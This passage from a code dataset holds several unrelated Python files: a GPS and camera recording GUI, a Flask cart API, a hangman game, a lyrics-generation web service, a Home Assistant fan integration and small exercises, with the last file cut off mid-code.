\n\n\n self.video_output = True\n # Start the periodic call in the GUI .\n\n self.fps.start()\n self.periodicCall()\n\n\n\n def periodicCall(self):\n \"\"\"\n Check every 1 ms the connection to the GPS system and camera and \n send them to GUI part.\n \"\"\"\n\n if self.gps.running or self.frame is not None or self.frame1 is not None:\n self.check = True\n\n # Update the GUI of the camera and GPS status\n self.gui.processIncoming(self.cameras_state, self.gps.running, self.video_output, self.frame, self.frame1)\n \n\n if not self.running:\n # This is the brutal stop of the system.\n sys.exit(1)\n # # Repeat this function every 1 ms \n # self.f = self.f+1\n # print(self.f)\n self.master.after(1, self.periodicCall)\n\n def checkGpsConnection(self, interval = 1):\n \"\"\"\n Thread to Check the port connection and the status of the GPS System\n every second.\n \"\"\"\n while True:\n # Get the GPS port connection\n verify_gps_connection, gps_port = self.gps.get_port()\n if not verify_gps_connection:\n self.gps.running = False\n self.gps.isConnected = False\n elif not self.gps.running:\n self.gps.running = False\n self.gps.open_gps(gps_port,self.gps.baudrate)\n else:\n self.gps.running = True\n self.gps.isConnected = True\n\n time.sleep(interval)\n \n\n\n def checkCameraConnection(self, interval = 1):\n \"\"\"\n Thread to Check the port connection and the status of the Camera\n every second.\n \"\"\"\n while True:\n self.cameras_state = self.find_cam()\n if not self.cameras_state[0]:\n time.sleep(1)\n continue\n if not self.cameras_state[2]:\n time.sleep(1)\n continue\n\n time.sleep(interval)\n\n \n \n def readCameraThread(self, interval=0.05):\n while True:\n if self.cameras_state[0]:\n try:\n self.grabbed ,self.frame = self.camera.read()\n except AttributeError:\n time.sleep(2)\n if self.cameras_state[2]:\n try:\n self.grabbed1 ,self.frame1 = self.camera1.read()\n except AttributeError:\n time.sleep(2)\n # try:\n # self.frame = self.detect(self.frame2, net.eval(), transform)\n # except RuntimeError:\n # print(\"Runtime error\")\n # if self.recordingThread.record_thread is not None and self.recordingThread.isAlive():\n # print(\"putting in cam queue\")\n # self.cam_queue.put(self.frame)\n time.sleep(interval)\n\n self.fps.update()\n\n def readGpsThread(self, interval=1):\n\n while True:\n\n if self.gps.running:\n self.gps.read()\n\n time.sleep(interval)\n # if self.recordingThread.record_thread is not None and self.recordingThread.isAlive():\n # print(\"Putting in gps queue\")\n # self.gps_queue.put(self.gps)\n\n\n def recordData(self):\n \"\"\"\n This function listens to the record button and starts the recording thread accordingly\n \"\"\"\n if self.check:\n if not self.record:\n self.video_output = False\n self.recordingThread.start()\n self.record = True\n self.gui.btn_record.configure(text=\"Recording\", bg=\"red\")\n self.gui.progress_bar.start(int(10000/100)) # duration of videos divided by 100\n else:\n print(\"Alreadiy recording\")\n else:\n print(\"Cannot record, There is no device connected !\")\n\n\n def stopRecord(self):\n \"\"\"\n This function listens to the record button and starts the recording thread accordingly\n \"\"\"\n if self.record:\n self.video_output = True\n self.recordingThread.stop()\n self.record = False\n self.gui.btn_record.configure(text=\"Record Data\", bg=\"green\")\n self.gui.progress_bar.stop()\n else:\n print(\"There is no recording\")\n\n def find_cam(self):\n camera_indexes =[]\n cmd = [\"/usr/bin/v4l2-ctl\", \"--list-devices\"]\n out, err = subprocess.Popen(cmd,stdout=PIPE, stderr=PIPE).communicate()\n out, err = out.strip(), err.strip()\n for l in [i.split(b'\\n\\t') for i in out.split(b'\\n\\n')]:\n if \"See3CAM_CU20\" in l[0].decode(encoding=\"UTF-8\"):\n camera_indexes.append(int(l[1].decode(encoding=\"UTF-8\")[-1]))\n\n\n\n if camera_indexes.__len__() == 2:\n return (True, camera_indexes[0], True, camera_indexes[1])\n elif camera_indexes.__len__() == 1:\n return (True, camera_indexes[0], False, None)\n else:\n return (False, None, False, None)\n \n def detect(self, frame, net, transform): # We define a detect function that will take as inputs, a frame, a ssd neural network, and a transformation to be applied on the images, and that will return the frame with the detector rectangle.\n\n height, width = frame.shape[:2] # We get the height and the width of the frame.\n frame_t = transform(frame)[0] # We apply the transformation to our frame.\n x = torch.from_numpy(frame_t).permute(2, 0, 1) # We convert the frame into a torch tensor.\n x = Variable(x.unsqueeze(0)) # We add a fake dimension corresponding to the batch.\n x = x.cuda()\n y = net(x) # We feed the neural network ssd with the image and we get the output y.\n detections = y.data # We create the detections tensor contained in the output y.\n scale = torch.Tensor([width, height, width, height]) # We create a tensor object of dimensions [width, height, width, height].\n for i in range(detections.size(1)): # For every class:\n if (labelmap[i-1] == \"car\") or (labelmap[i-1] == \"person\") or (labelmap[i-1] == \"motorbike\") or (labelmap[i-1] == \"bicycle\") or (labelmap[i-1] == \"bus\"):\n j = 0 # We initialize the loop variable j that will correspond to the occurrences of the class.\n while detections[0, i, j, 0] >= 0.6: # We take into account all the occurrences j of the class i that have a matching score larger than 0.6.\n # We get the coordinates of the points at the upper left and the lower right of the detector rectangle.\n pt = (detections[0, i, j, 1:] * scale).cpu().numpy()\n topLeft = (int(pt[0]), int(pt[1])) # We get the top Left corner of the ogject detected\n bottomRight = (int(pt[2]), int(pt[3])) # We get the bottom Right corner of the object detected\n x, y = topLeft[0] , topLeft[1] # We get the coordinates of the top Left Corner\n x = max(x,0)\n y = max(y,0)\n w, h = bottomRight[0] - topLeft[0], bottomRight[1] - topLeft[1] # We get the width and the height of the object detected\n #print(\"x = \", x, \" y = \", y, \"w = \", w , \" h = \" ,h)\n cv2.rectangle(frame, topLeft, bottomRight, (0, 0, 0), cv2.FILLED) # We draw a rectangle around the detected object.\n cv2.putText(frame, labelmap[i - 1], topLeft, cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA) # We put the label of the class right above the rectangle.\n j += 1 # We increment j to get to the next occurrence.\n return frame # We return the original frame with the detector rectangle and the label around the detected object.\n\n \n\nrand = random.Random()\nroot = tkinter.Tk()\nclient = ThreadedClient(root)\n\ndef close_application_globally():\n \"\"\"\n This function close the different threads of the application when\n the user exits the App. \n \"\"\"\n client.fps.stop()\n try:\n client.camera.stop()\n client.camera1.stop()\n except AttributeError:\n print(\"There is no camera\")\n print(\"[INFO] elapsed time: {:.2f}\".format(client.fps.elapsed()))\n print(\"[INFO] approx. FPS: {:.2f}\".format(client.fps.fps()))\n print(\"Closing Threads and dependencies\")\n client.running = 0\n client.gps.stop()\n \n root.destroy()\n sys.exit(1)\n\nroot.protocol(\"WM_DELETE_WINDOW\", close_application_globally)\nroot.mainloop()","repo_name":"omarsomey/Digits4RailMaps","sub_path":"d4rm_tool_old.py","file_name":"d4rm_tool_old.py","file_ext":"py","file_size_in_byte":13490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73888567235","text":"from . import config_dt\nimport numpy\nfrom sklearn.tree import DecisionTreeClassifier\nfrom matplotlib import pyplot as plt\nfrom sklearn import tree\n\nlocal_config = config_dt.Config()\nlocal_config.build_data()\n\nclass Decision_Tree:\n def __init__(self, preprocessed_data, labels, feature_columns):\n self.labels = labels\n self.data = preprocessed_data\n self.feature_columns = feature_columns\n \n def train(self):\n self.decision_tree = DecisionTreeClassifier()\n self.decision_tree.fit(self.data, self.labels)\n\n def visualize(self):\n fig = plt.figure(figsize=(25,20))\n _ = tree.plot_tree(self.decision_tree, \n feature_names=self.feature_columns, \n class_names=local_config.class_names,\n filled=True)\n fig.savefig(\"tree.png\")\n\n def evaluate(self):\n pass\n\n def predict(self, data_to_predict):\n return self.decision_tree.predict(data_to_predict)\n","repo_name":"Yassellee/ContextTree","sub_path":"decision_tree/tree_builder.py","file_name":"tree_builder.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34732587571","text":"def fibonacci(n):\r\n if n == 0:\r\n return 0\r\n if n == 1:\r\n return 1\r\n if n < 0:\r\n print('Enter non negative integer')\r\n else:\r\n return fibonacci(n-1) + fibonacci(n-2)\r\n\r\n\r\ndef main():\r\n n1 = int(input(\"Enter the starting number: \"))\r\n n2 = int(input(\"Enter the ending number: \"))\r\n for i in range(n1, n2+1):\r\n print(fibonacci(i), end=' ')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"raksh8/MapleLabs-Python-Training","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3620001838","text":"import json\nfrom decimal import Decimal\n\nfrom flask import (\n Blueprint,\n request,\n session\n)\nfrom flask_babel import gettext as _\n\nfrom app.database import db\n\nfrom app.helpers import (\n model_create,\n model_update,\n model_delete,\n log_info,\n toint\n)\nfrom app.helpers.date_time import current_timestamp\nfrom app.helpers.user import (\n check_login,\n get_uid\n)\n\nfrom app.services.response import ResponseJson\nfrom app.services.api.cart import (\n CartService,\n CheckoutService,\n CartStaticMethodsService\n)\n\nfrom app.models.order import (\n Order,\n OrderGoods\n)\nfrom app.models.item import Goods\nfrom app.models.cart import Cart\n\n\ncart = Blueprint('api.cart', __name__)\n\nresjson = ResponseJson()\nresjson.module_code = 12\n\n\n@cart.route('/')\ndef index():\n \"\"\"购物车\"\"\"\n resjson.action_code = 10\n\n uid = get_uid()\n session_id = session.sid\n is_login = 1 if uid else 0\n\n cs = CartService(uid, session_id)\n cs.check()\n log_info(cs)\n data = {\n 'is_login': is_login,\n 'carts': cs.carts,\n 'cart_total': cs.cart_total,\n 'cart_amount': cs.cart_amount,\n 'items_amount': cs.items_amount,\n 'items_quantity': cs.items_quantity}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/add')\ndef add():\n \"\"\"加入购物车\"\"\"\n resjson.action_code = 11\n\n uid = get_uid()\n session_id = session.sid\n\n args = request.args\n order_id = toint(args.get('order_id', '0'))\n goods_id = toint(args.get('goods_id', '0'))\n quantity = toint(args.get('quantity', '1'))\n current_time = current_timestamp()\n items_data = []\n\n if order_id > 0:\n order = Order.query.filter(Order.order_id == order_id).filter(\n Order.uid == uid).first()\n if not order:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n order_goods = OrderGoods.query.filter(\n OrderGoods.order_id == order_id).all()\n for _order_goods in order_goods:\n items_data.append(\n {'goods_id': _order_goods.goods_id,\n 'quantity': _order_goods.goods_quantity})\n else:\n # 检查\n if goods_id <= 0 or quantity < 1:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n items_data.append({'goods_id': goods_id, 'quantity': quantity})\n\n for item_data in items_data:\n goods_id = item_data.get('goods_id')\n quantity = item_data.get('quantity')\n\n # 检查\n item = Goods.query.get(goods_id)\n if not item:\n return resjson.print_json(10, _(u'找不到商品'))\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.goods_id == goods_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n\n # 计算商品购买数量\n quantity += cart.quantity if cart else 0\n\n if order_id <= 0 and quantity > item.stock_quantity:\n return resjson.print_json(11, u'库存不足')\n\n # 是否创建购物车商品\n if not cart:\n data = {\n 'uid': uid,\n 'session_id': session_id,\n 'goods_id': goods_id,\n 'quantity': 0,\n 'is_checked': 1,\n 'checkout_type': 1,\n 'add_time': current_time}\n cart = model_create(Cart, data)\n # 更新购物车商品\n\n data = {'quantity': quantity, 'update_time': current_time}\n cart = model_update(cart, data)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n return resjson.print_json(\n 0,\n u'ok',\n {'cart_total': cs.cart_total, 'cart_num': quantity})\n\n\n@cart.route('/update')\ndef update():\n \"\"\"更新购物车\"\"\"\n resjson.action_code = 12\n\n uid = get_uid()\n session_id = session.sid\n\n args = request.args\n cart_id = toint(args.get('cart_id', 0))\n quantity = toint(args.get('quantity', 0))\n current_time = current_timestamp()\n\n # 检查\n if cart_id <= 0 or quantity <= 0:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(10, _(u'购物车里找不到商品'))\n\n # 更新购物车商品\n data = {'quantity': quantity, 'update_time': current_time}\n model_update(cart, data, commit=True)\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n for _cart in cs.carts:\n if _cart['cart'].cart_id == cart_id:\n _items_amount = _cart['items_amount']\n\n # 商品状态\n item = Goods.query.get(cart.goods_id)\n is_valid, valid_status = CartStaticMethodsService.check_item_statue(\n item, cart)\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount, '_items_amount': _items_amount,\n 'is_valid': is_valid, 'valid_status': valid_status}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/remove')\ndef remove():\n \"\"\"删除购物车商品\"\"\"\n resjson.action_code = 13\n\n uid = get_uid()\n session_id = session.sid\n\n carts_id = request.args.get('carts_id', '').strip()\n carts_id = carts_id.split(',')\n\n # 检查\n if len(carts_id) == 0:\n return resjson.print_json(10, _(u'请选择需要删除的商品'))\n\n for cart_id in carts_id:\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(11, _(u'购物车里找不到商品'))\n\n # 删除购物车商品\n model_delete(cart)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checked')\ndef checked():\n \"\"\"选中\"\"\"\n resjson.action_code = 14\n\n uid = get_uid()\n session_id = session.sid\n\n carts = request.args.get('carts', '[]').strip()\n current_time = current_timestamp()\n\n try:\n carts = json.loads(carts)\n except Exception as e:\n return resjson.print_json(resjson.PARAM_ERROR)\n for cart in carts:\n cart_id = toint(cart.get('cart_id', 0))\n is_checked = toint(cart.get('is_checked', -1))\n\n # 检查\n if cart_id <= 0 or is_checked not in [0, 1]:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(10, _(u'购物车里找不到商品'))\n\n # 更新购物车商品\n data = {'is_checked': is_checked, 'update_time': current_time}\n model_update(cart, data)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checkout/amounts')\ndef checkout_amounts():\n \"\"\"结算金额\"\"\"\n resjson.action_code = 15\n\n if not check_login():\n return resjson.print_json(resjson.NOT_LOGIN)\n uid = get_uid()\n\n args = request.args\n carts_id = args.get('carts_id', '[]').strip()\n shipping_id = toint(args.get('shipping_id', '0'))\n coupon_id = toint(args.get('coupon_id', '0'))\n\n try:\n carts_id = json.loads(carts_id)\n carts_id = [toint(cart_id) for cart_id in carts_id]\n except Exception as e:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n cs = CheckoutService(uid, carts_id, shipping_id, coupon_id)\n if not cs.check():\n return resjson.print_json(11, cs.msg)\n\n data = {'items_amount': cs.items_amount,\n 'shipping_amount': cs.shipping_amount,\n 'discount_amount': cs.discount_amount,\n 'pay_amount': cs.pay_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checkout')\ndef checkout():\n \"\"\"确认订单\"\"\"\n\n resjson.action_code = 16\n\n if not check_login():\n return resjson.print_json(resjson.NOT_LOGIN)\n uid = get_uid()\n\n args = request.args\n order_id = toint(args.get('order_id', 0))\n # 已有订单,获取订单数据\n if order_id > 0:\n data = CartStaticMethodsService.pay_page(order_id, uid, 'api')\n if not data[0]:\n return resjson.print_json(11, data[1])\n\n return resjson.print_json(0, u'ok', data[2])\n\n buy_now = toint(args.get('buy_now', 0))\n goods_id = toint(args.get('goods_id', 0))\n carts_id = args.get('carts_id', '')\n\n if buy_now not in [0, 1]:\n return resjson.print_json(resjson.PARAM_ERROR)\n # 立即购买\n if buy_now == 1 and goods_id <= 0:\n return resjson.print_json(resjson.PARAM_ERROR)\n # 购物车购买\n if buy_now == 0 and carts_id == '':\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 结算页面\n data = CartStaticMethodsService.checkout_page(uid, 'api')\n if not data[0]:\n return resjson.print_json(12, data[1])\n\n return resjson.print_json(0, u'ok', data[2])\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/views/api/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"70089457474","text":"#Thomas Thorpe\r\n#Pet Service System PopulateXCombo\r\n\r\nfrom PetServiceDatabase import *\r\n\r\ndef PopulateVetCombo(came_from):\r\n sql = \"\"\"SELECT VetFirstName, VetLastName FROM Vet\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n vet_list = [\"Add New Vet\"]\r\n for count in range(len(data)):\r\n vet_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.vet_combo.addItems(vet_list)\r\n\r\ndef PopulateEmergencyCombo(came_from):\r\n sql = \"\"\"SELECT EmFirstName, EmLastName FROM Emergency\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n emergency_list = [\"Add New Emergency Contact\"]\r\n for count in range(len(data)):\r\n emergency_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.emergency_combo.addItems(emergency_list)\r\n\r\ndef PopulateCustomerCombo(came_from):\r\n sql = \"\"\"SELECT FirstName, LastName FROM Customer\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n customer_list = [\"Add New Customer\"]\r\n if len(data) != 0:\r\n for count in range(len(data)):\r\n customer_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.customer_combo.addItems(customer_list)\r\n came_from.customer_combo.setCurrentIndex(1) #set default to first customer not \"add new x\"\r\n else:\r\n came_from.customer_combo.addItems(customer_list)\r\n came_from.customer_combo.setCurrentIndex(0)","repo_name":"ThomasThorpe/PetMindingBusiness","sub_path":"Program/PopulateXCombo.py","file_name":"PopulateXCombo.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37345190889","text":"import pygame\r\nfrom pygame import mixer\r\nimport random\r\n\r\ndef gettext(x, y, label, numeric, size, spaces,leng):\r\n word = [] # hold word or number to return\r\n length = 0 # gets length of entered word - will not allow more than the size\r\n prompt = font.render(label, True, black) #render the prompt\r\n pygame.draw.rect(screen,white,(x-300,y,800,50)) # draw a white recangle over previous x an y cordinates\r\n screen.blit(prompt, (x, y)) # display the new x and y coordinates\r\n\r\n pygame.display.update() # update display\r\n while True: # main loop to enter data\r\n\r\n for event in pygame.event.get(): # user entered something\r\n\r\n if event.type == pygame.QUIT: # user decided to end program (click X at top right)\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN: # user touch a key\r\n if event.key == pygame.K_SPACE and spaces==True: # if space then force space and append to the workd\r\n word.append(\" \") # if they press space add a blank space to the word\r\n if event.key == pygame.K_RETURN: # if Return then user is finished entery data\r\n\r\n newword = \"\" # holds word to return from function\r\n\r\n for char in word: # loop to remove any spaces\r\n if (spaces == False):\r\n if char != \"space\":\r\n newword = newword + char #if spaces are not allowed only add the letters to the list that are not space\r\n return newword #return the word\r\n break\r\n if event.key == pygame.K_DELETE or event.key == pygame.K_BACKSPACE:\r\n del word[-1:] #remove the last letter of the word\r\n newword = \"\" \r\n for char in word:\r\n newword = newword + char #redo the word without the last letter\r\n length=length-1 #remove one from the length of the word\r\n \r\n pygame.draw.rect(screen, white, (x+leng, y, 200, 50)) #draw a white rectangle over the removed letter\r\n afterdelete = font.render(newword, True, black) #render the new word without the last letter\r\n \r\n screen.blit(afterdelete, (x+leng, y)) # display the new x and y coordinates\r\n pygame.display.update() # update display\r\n else:\r\n key = pygame.key.name(event.key)\r\n if len(key) == 1 and length < size: #if the length maximum has not been exeeded \r\n ascii = ord(key)\r\n if (numeric == True): # only allow number input\r\n if ascii > 47 and ascii < 59: # number input\r\n word.append(key)\r\n length = length + 1\r\n else:\r\n word.append(key) #add the letter to the word\r\n length = length + 1\r\n newword=\"\" \r\n for char in word:\r\n newword = newword + char #redo new word by clearing it then adding the letters back\r\n output = font.render(newword, True, black) #renders the word\r\n prompt = font.render(label, True, black) #renders the prompt\r\n\r\n pygame.draw.rect(screen, white, (x, y, 200, 50)) #draws over the old content to make room for the new\r\n screen.blit(prompt, (x, y)) # display the new x and y coordinates\r\n screen.blit(output, (x + leng, y)) # display the new x and y coordinates\r\n pygame.display.update() # update display\r\n\r\npygame.init()\r\n\r\nname=pygame.display.set_caption(\"Hangman\") #changes the name of the program to Hangman\r\n\r\nhangmen=[] #the list to hold the diferent hangmen\r\n\r\nhangmen.append(pygame.image.load(\"hangman 1.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 2.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 3.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 4.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 5.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 6.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 7.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 8.png\"))\r\n\r\n#loads in all the images of hangman\r\n\r\nscreen=pygame.display.set_mode((850,800)) #sets the screen size\r\n\r\nblack=(0,0,0)\r\nwhite=(255,255,255)\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nfont=pygame.font.SysFont(\"comicsansms\",24)\r\nplayers=gettext(100,100,\"# of players :\",True,1,False,200) #get the number of players one or 2\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nif players==\"1\":\r\n words=[]\r\n file=open('words.txt','r')\r\n for word in file:\r\n words.append(word)\r\n file.close()\r\n #get the words from the file\r\n r=random.randint(0,853)\r\n word=words[r]\r\n word=word.lower()\r\n word=word.strip()\r\n #choose a word then strip it and put it in lower case\r\n\r\nif players==\"2\":\r\n label=font.render(\"Enter the word for your opponent to\",True,black)\r\n screen.blit(label,(100,100))\r\n pygame.display.update()\r\n word=gettext(100,150,\"guess (max 7)and click enter :\",False,8,False,350)\r\n word=word.lower()\r\n \r\n\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nanswered=False #the player hasent yet entered an answer\r\nhangmantype=1 #the first hangman picture\r\n\r\n#location of underline x position\r\nlocx=100\r\n\r\nfor x in range(0,len(word)):\r\n label=font.render(\"_\",True,black)\r\n screen.blit(label,(locx,600))\r\n pygame.display.update()\r\n locx=locx+100\r\n #draw the blank spaces in under the letters\r\n\r\nlocx=100 #the first blank letter\r\nguessed=-125 #how many letters or words have been guessed\r\nletssolved=0 #the number of letters that have been solved\r\nhangmantype=0 #the type of hangman displayed\r\nloose=False #they havent lost the game\r\nwhile loose==False:\r\n screen.blit(hangmen[hangmantype],(400,200))\r\n pygame.display.update()\r\n guess=gettext(100,150,\"guess a letter or the full word :\",False,8,False,350)\r\n letplace=0 #the location of the letter in the word\r\n isletterthere=False #to make you gain a hangman level if the letter you chose is not there\r\n if len(guess)==1:\r\n for let in word:\r\n if let==guess:\r\n label=font.render(let,True,black)\r\n screen.blit(label,(locx+letplace,600))\r\n letssolved+=1\r\n isletterthere=True\r\n letplace+=100\r\n if isletterthere==False:\r\n hangmantype+=1\r\n guessed+=125\r\n label=font.render(guess,True,black)\r\n screen.blit(label,(guessed,100))\r\n pygame.display.update()\r\n \r\n else:\r\n guessed+=125\r\n if guess==word:\r\n label=font.render(\"you got it!\",True,black)\r\n screen.blit(label,(100,50))\r\n else:\r\n label=font.render(guess,True,black)\r\n screen.blit(label,(guessed,100))\r\n hangmantype+=1\r\n if letssolved==len(word):\r\n label=font.render(\"you got it!\",True,black)\r\n screen.blit(label,(100,50))\r\n pygame.display.update()\r\n break\r\n screen.blit(hangmen[hangmantype],(400,200))\r\n pygame.display.update()\r\n if hangmantype>6:\r\n label=font.render(\"you lose word was :\"+word,True,black)\r\n screen.blit(label,(100,50))\r\n pygame.display.update()\r\n loose=True\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"nicholves/Hangman","sub_path":"Hangman (1).py","file_name":"Hangman (1).py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11107684027","text":"import os\nfrom LanguageGenerationLSTM import LanguageGenerationLSTM\nfrom bottle import Bottle, run, response\nimport bottle\n\nrockModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-rock\", \"./data/Rock\")\nprint(\"----- ROCK MODEL LOADED -----\")\npopModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-pop\", \"./data/Pop\")\nprint(\"----- POP MODEL LOADED -----\")\ncountryModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-country\", \"./data/Country\")\nprint(\"----- COUNTRY MODEL LOADED -----\")\nmetalModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-metal\", \"./data/Metal\")\nprint(\"----- METAL MODEL LOADED -----\")\n\napp = Bottle()\n\n@app.route('/rock')\ndef getRockSong():\n song = rockModel.createSong()\n return {\"song\": song, \"genre\": \"Rock\"}\n\n@app.route('/metal')\ndef getMetalSong():\n song = metalModel.createSong()\n return {\"song\": song, \"genre\": \"Metal\"}\n\n@app.route('/country')\ndef getCountrySong():\n song = countryModel.createSong()\n return {\"song\": song, \"genre\": \"Country\"}\n\n@app.route('/pop')\ndef getPopSong():\n song = popModel.createSong()\n return {\"song\": song, \"genre\": \"Pop\"}\n\n\nclass EnableCors(object):\n name = 'enable_cors'\n api = 2\n\n def apply(self, fn, context):\n def _enable_cors(*args, **kwargs):\n # set CORS headers\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n if bottle.request.method != 'OPTIONS':\n # actual request; reply with the actual response\n return fn(*args, **kwargs)\n\n return _enable_cors\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n print(\"----- STARTING SERVER ON PORT 5000 -----\")\n app.install(EnableCors())\n app.run(host='0.0.0.0', port=port, debug=True)\n","repo_name":"dylanedwards-pubnub/hackathon-march-2022","sub_path":"music-generator-api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14805481897","text":"from homeassistant import config_entries\nimport voluptuous as vol\n\nfrom .const import \\\n DOMAIN, \\\n CONF_ENABLE_LIGHT, CONF_FAN_HOST, CONF_FAN_NAME\n\n\ndef get_schema(user_input=None):\n data = {}\n if user_input is not None:\n data = user_input\n\n def default(key, default_value=None):\n kwargs = {}\n\n if bool(data.get(key)):\n kwargs['default'] = data[key]\n elif default_value:\n kwargs['default'] = default_value\n\n return kwargs\n\n return vol.Schema({\n vol.Required(CONF_FAN_HOST, **default(CONF_FAN_HOST)): str,\n vol.Required(CONF_FAN_NAME, **default(CONF_FAN_NAME)): str,\n vol.Required(CONF_ENABLE_LIGHT, **default(CONF_ENABLE_LIGHT, True)): bool\n })\n\nclass ModernFormsConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n VERSION = 1\n\n async def async_step_user(self, user_input=None):\n errors = {}\n\n if user_input is not None:\n if len(errors) == 0:\n await self.async_set_unique_id(\n user_input[CONF_FAN_HOST], raise_on_progress=False\n )\n\n return self.async_create_entry(\n title=user_input[CONF_FAN_NAME],\n data=user_input,\n )\n\n return self.async_show_form(\n step_id=\"user\", data_schema=get_schema(user_input), errors=errors)\n","repo_name":"jimpastos/ha-modernforms","sub_path":"custom_components/modernforms/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"23427270831","text":"import os, sys, re\n\n\n#2 cookies per second\n#C cookies = cost of cookie farm\n#extra F cookies per second per farm\n#X unspent cookies = victory\n#C F X\n#Format: \\d+\\.\\d+\n\n#recursive function f(s, c, f, x, n)\n# s is current seconds\n# c is farm cost\n# f is addtl cookies/farm\n# x is cookies to earn\n# n is farms owned\n# check seconds for victory\n# check seconds for farm purchase\n# call self with additional farm\n# return lowest seconds\n# does increased rate offset C extra seconds\n# if I keep my C cookies, can I get to X quicker?\n\ndef compare_times(s, c, f, x, n):\n solved = False\n while not solved:\n wait = s + (x / (2 + f * n)) # assume this is slower\n buy = s + (c / (2 + f * n)) + (x / (2 + f * (n + 1)))\n if wait < buy:\n return wait\n else:\n s = s + (c / (2 + f * n))\n n = n + 1\n\ndef magic(cases, data):\n ans = []\n for i in xrange(cases):\n ans.append(compare_times(0.0, data[i][0], data[i][1], data[i][2], 0))\n return ans\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n sys.exit()\n with 